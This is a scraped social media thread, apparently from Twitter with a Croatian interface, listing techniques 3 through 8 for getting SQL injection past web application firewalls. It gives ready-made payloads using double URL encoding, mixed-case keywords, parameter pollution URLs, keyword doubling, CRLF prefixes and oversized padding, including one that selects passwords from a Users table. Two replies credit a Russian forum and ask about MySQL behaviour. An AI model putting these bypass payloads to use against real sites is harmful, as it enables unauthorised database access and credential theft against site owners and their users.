3. URL encoding: %252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'-- 4. Changing Cases: UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
-
-
Prikaži ovu nit
-
5. HTTP Parameter Pollution (HPP): Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 -- HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+
Prikaži ovu nit -
6. Replacing keywords technique hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5-- 7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications Putting theses chars at the beggining of payload %0A%0d+select+user+from+dual+%0A%0D
Prikaži ovu nit -
8. Buffer Overflow bypassing: and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
Prikaži ovu nit
Kraj razgovora
Novi razgovor -
-
-
Please give credits to your inspiration. Aka the Russian forum this was posted on recently.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
Could you please enlighten me which version of mysql is vulnerable to 2nd way? Simply i type: "se/**/lect" but mysql take it as "se lect". Thank you.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.